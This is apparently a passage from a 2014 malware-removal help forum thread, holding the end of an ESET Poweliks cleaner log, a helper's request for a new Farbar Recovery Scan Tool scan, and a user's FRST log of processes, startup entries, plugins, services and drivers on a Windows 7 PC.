[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0063-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0064-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0064-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0064-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0065-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0065-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0065-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0066-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0066-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0066-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0067-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0067-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0067-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0068-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0068-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0068-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0069-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0069-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0069-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0070-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0070-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0070-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0071-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0071-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0071-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-FFFF-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{DBFA3C03-20D5-4EE5-8C06-B8C4C2B71783}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{E19F9331-3110-11D4-991C-005004D3B3DB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{E67BE843-BBBE-4484-95FB-05271AE86750}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{EB06378B-ABB6-4B3C-9B40-D488DD8A6E93}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{F9A1EFBA-6244-42e1-B31F-B20615298617}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{FD10EA6A-0D14-4AA2-A376-0C8D51CA8779}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{0F9285DF-3511-4FE6-A587-CD8F61A121CA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{699A646B-C61E-4C36-A253-620E4EBD294C}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{71FDCAEA-B6F2-4B6C-A18C-6C85F0E4662F}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{C9E37353-EC76-4A58-B575-BBA8B4BD06D1}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}]
[2014.11.07 16:06:35.311] - INFO: Processing [HKLM\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32]...
[2014.11.07 16:06:35.311] - INFO: Processing value [] = [%systemroot%\sysWOW64\wbem\wmiprvse.exe]
[2014.11.07 16:06:35.311] - INFO: Processing value [] = [%systemroot%\system32\wbem\wmiprvse.exe]
[2014.11.07 16:06:35.311] - INFO: Processing invalid values in [HKLM\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32]...
[2014.11.07 16:06:35.311] - INFO: Processing value [] = [%systemroot%\sysWOW64\wbem\wmiprvse.exe]
[2014.11.07 16:06:35.311] - INFO: Processing value [ServerExecutable] = [%systemroot%\sysWOW64\wbem\wmiprvse.exe]
[2014.11.07 16:06:35.311] - INFO: Processing value [] = [%systemroot%\system32\wbem\wmiprvse.exe]
[2014.11.07 16:06:35.311] - INFO: Processing value [ServerExecutable] = [%systemroot%\system32\wbem\wmiprvse.exe]
[2014.11.07 16:06:35.311] - INFO: Processing invalid subkeys in [HKLM\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32]...
[2014.11.07 16:06:35.311] - INFO: Processing [HKLM\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}]...
[2014.11.07 16:06:35.311] - INFO: Processing subkey [\Registry\Machine\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32]
[2014.11.07 16:06:35.311] - INFO: Processing subkey [\Registry\Machine\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32]
[2014.11.07 16:06:35.311] - INFO: Win32/Poweliks not found
[2014.11.07 16:07:05.513] - End
The duplicate dllhost.exe *32 processes haven't returned
Good
What TDSSKiller alerted us to were unsigned files but to legitimate applications.
Sorry you had to make multiple post but I knew the logs would be long.
OK, what to do next.
I would like to see a new FRST log including the Addition.txt.
Run FRST
Don´t change the checkboxes just click on Scan.
https://dl.dropboxusercontent.com/u/73555776/frst.JPG
Ensure there is a check mark for Addition.txt
Logfiles are created on your desktop.
Post the FRST.txt
- Please also paste that along with the FRST.txt into your reply.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ascot1340
2014-11-08, 00:37
The dllhost.exe *32 processes are now back running in the task manager after a little black window popped up and then closed again (the same as last time).
ascot1340
2014-11-08, 00:51
The FRST logs are below. Should I go ahead and run the OTL tool you recommended a few posts back but I never ran?
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 02-11-2014
Ran by Ryan (administrator) on RYAN-PC on 07-11-2014 17:46:28
Running from C:\Users\Ryan\Desktop
Loaded Profiles: UpdatusUser & Ryan (Available profiles: UpdatusUser & Ryan)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
(Nalpeiron Ltd.) C:\Windows\SysWOW64\nlssrv32.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Sentelic Corporation) C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\FspUip.exe
(SRS Labs, Inc.) C:\Program Files\SRS Labs\SRS Control Panel\SRSPanel_64.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
() C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe
(GARMIN Corp.) C:\Program Files (x86)\Garmin\ANT Agent\ANT Agent.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(VIZIO Computer Inc.) C:\Program Files (x86)\VIZIO\VIZIO_FN_Key_Utility\XVx.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
() C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Windows\System32\MsSpellCheckingFacility.exe
==================== Registry (Whitelisted) ==================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [FspUip] => C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\FspUip.exe [5406104 2012-05-01] (Sentelic Corporation)
HKLM\...\Run: [SRS Premium Sound HD] => C:\Program Files\SRS Labs\SRS Control Panel\SRSPanel_64.exe [2170752 2012-05-09] (SRS Labs, Inc.)
HKLM\...\Run: [AtherosBtStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [1020064 2012-02-13] (Atheros Commnucations)
HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe [800416 2012-02-13] (Atheros Commnucations)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1331288 2014-08-22] (Microsoft Corporation)
HKLM\...\Run: [CDAServer] => C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe [462712 2012-03-09] ()
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [291608 2012-02-26] (Intel Corporation)
HKLM-x32\...\Run: [OSD Utility] => C:\Program Files (x86)\VIZIO\VIZIO_FN_Key_Utility\XVx.exe [7892992 2012-04-27] (VIZIO Computer Inc.)
HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe [40336 2014-09-04] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-02-12] (Apple Inc.)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-02-21] (Apple Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [271744 2014-09-26] (Oracle Corporation)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\...\Run: [ANT Agent] => C:\Program Files (x86)\Garmin\ANT Agent\ANT Agent.exe [14731776 2013-02-15] (GARMIN Corp.)
HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\...\RunOnce: [FlashPlayerUpdate] => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_15_0_0_167_ActiveX.exe [854704 2014-09-23] (Adobe Systems Incorporated)
AppInit_DLLs: C:\Windows\System32\nvinitx.dll => C:\Windows\System32\nvinitx.dll [260928 2012-03-14] (NVIDIA Corporation)
AppInit_DLLs-x32: C:\Windows\SysWOW64\nvinit.dll => C:\Windows\SysWOW64\nvinit.dll [215360 2012-03-14] (NVIDIA Corporation)
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x7EF78E2F6EF8CF01
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll (Atheros Commnucations)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
DPF: HKLM-x32 {7530BFB8-7293-4D34-9923-61A11451AFC5} http://download.eset.com/special/eos/OnlineScanner.cab
DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
Tcpip\Parameters: [DhcpNameServer] 192.168.200.1
FireFox:
========
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.0.59 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @videolan.org/vlc,version=2.0.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @talk.google.com/GoogleTalkPlugin -> C:\Users\Ryan\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin HKCU: @talk.google.com/O1DPlugin -> C:\Users\Ryan\AppData\Roaming\Mozilla\plugins\npo1d.dll (Google)
FF Plugin HKCU: @tools.google.com/Google Update;version=3 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKCU: @tools.google.com/Google Update;version=9 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Ryan\AppData\Roaming\mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin ProgramFiles/Appdata: C:\Users\Ryan\AppData\Roaming\mozilla\plugins\npo1d.dll (Google)
Chrome:
=======
==================== Services (Whitelisted) =================
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [106144 2012-02-13] (Atheros Commnucations) [File not signed]
R2 ekrn; C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe [1337752 2013-09-12] (ESET)
R2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [128280 2012-03-28] ()
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [165144 2012-03-28] (Intel Corporation)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23784 2014-08-22] (Microsoft Corporation)
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [368624 2014-08-22] (Microsoft Corporation)
R2 nlsX86cc; C:\Windows\SysWOW64\nlssrv32.exe [66560 2012-11-12] (Nalpeiron Ltd.) [File not signed]
==================== Drivers (Whitelisted) ====================
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
U5 AppMgmt; C:\Windows\system32\svchost.exe [27648 2011-03-01] (Microsoft Corporation)
R3 CirrusLFD; C:\Windows\System32\DRIVERS\CSLFDx64.sys [35840 2012-04-02] (Cirrus Logic)
S3 ESETOlmarikOlmascoCleaner; C:\Windows\system32\Drivers\ESETOlmarikOlmascoCleaner.sys [156360 2014-04-11] ()
S3 libusb0; C:\Windows\System32\DRIVERS\libusb0.sys [44480 2011-05-17] (http://libusb-win32.sourceforge.net)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [269008 2014-07-17] (Microsoft Corporation)
R2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [125584 2014-07-17] (Microsoft Corporation)
U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [34808 2014-11-03] ()
R3 ViWDM; C:\Windows\System32\DRIVERS\ViWDM.SYS [14336 2012-03-07] (Primax Electronics Ltd.)
R3 vrvd5; C:\Windows\System32\DRIVERS\vrvd5.sys [13344 2014-04-15] (Rsupport Corporation)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
==================== NetSvcs (Whitelisted) ===================
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
==================== One Month Created Files and Folders ========
(If an entry is included in the fixlist, the file\folder will be moved.)
2014-11-07 16:07 - 2014-11-07 16:07 - 00328126 _____ () C:\Users\Ryan\Desktop\ESETPoweliksCleaner.exe_20141107.160712.11600.log
2014-11-07 16:06 - 2014-11-07 16:07 - 00328192 _____ () C:\Users\Ryan\Desktop\ESETPoweliksCleaner.exe_20141107.160632.9176.log
2014-11-07 15:57 - 2014-11-07 15:57 - 04184008 _____ (Kaspersky Lab ZAO) C:\Users\Ryan\Desktop\tdsskiller.exe
2014-11-07 15:57 - 2014-11-07 15:57 - 00186568 _____ (ESET) C:\Users\Ryan\Desktop\ESETPoweliksCleaner.exe
2014-11-07 15:53 - 2014-11-07 15:53 - 00000000 ___RD () C:\Users\Ryan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BT Devices
2014-11-03 21:28 - 2014-11-03 21:28 - 00002159 _____ () C:\Users\Ryan\AppData\Local\recently-used.xbel
2014-11-03 20:24 - 2014-11-03 20:25 - 00000000 ____D () C:\Users\Ryan\AppData\Local\{9B1BF085-634B-426D-BDB3-489C0053B60E}
2014-11-03 18:29 - 2014-11-03 18:29 - 00000632 _____ () C:\Users\Ryan\Desktop\JRT.txt
2014-11-03 18:26 - 2014-11-03 18:26 - 01706359 _____ (Thisisu) C:\Users\Ryan\Desktop\JRT.exe
2014-11-03 18:25 - 2014-11-03 18:25 - 00000730 _____ () C:\Users\Ryan\Desktop\AdwCleaner[S0].txt
2014-11-03 18:20 - 2014-11-03 18:22 - 00000000 ____D () C:\AdwCleaner
2014-11-03 18:20 - 2014-11-03 18:20 - 01375089 _____ () C:\Users\Ryan\Desktop\AdwCleaner.exe
2014-11-03 18:19 - 2014-11-03 18:19 - 00004981 _____ () C:\Users\Ryan\Desktop\RKreport_SCN_11032014_181839.log
2014-11-03 18:14 - 2014-11-03 18:14 - 00034808 _____ () C:\Windows\system32\Drivers\TrueSight.sys
2014-11-03 18:14 - 2014-11-03 18:14 - 00000000 ____D () C:\ProgramData\RogueKiller
2014-11-03 18:13 - 2014-11-03 18:13 - 14670424 _____ () C:\Users\Ryan\Desktop\RogueKiller.exe
2014-11-03 15:20 - 2014-11-03 15:20 - 00019461 _____ () C:\ComboFix.txt
2014-11-03 15:11 - 2011-06-26 01:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-11-03 15:11 - 2010-11-07 12:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-11-03 15:11 - 2009-04-19 23:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-11-03 15:11 - 2000-08-30 19:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
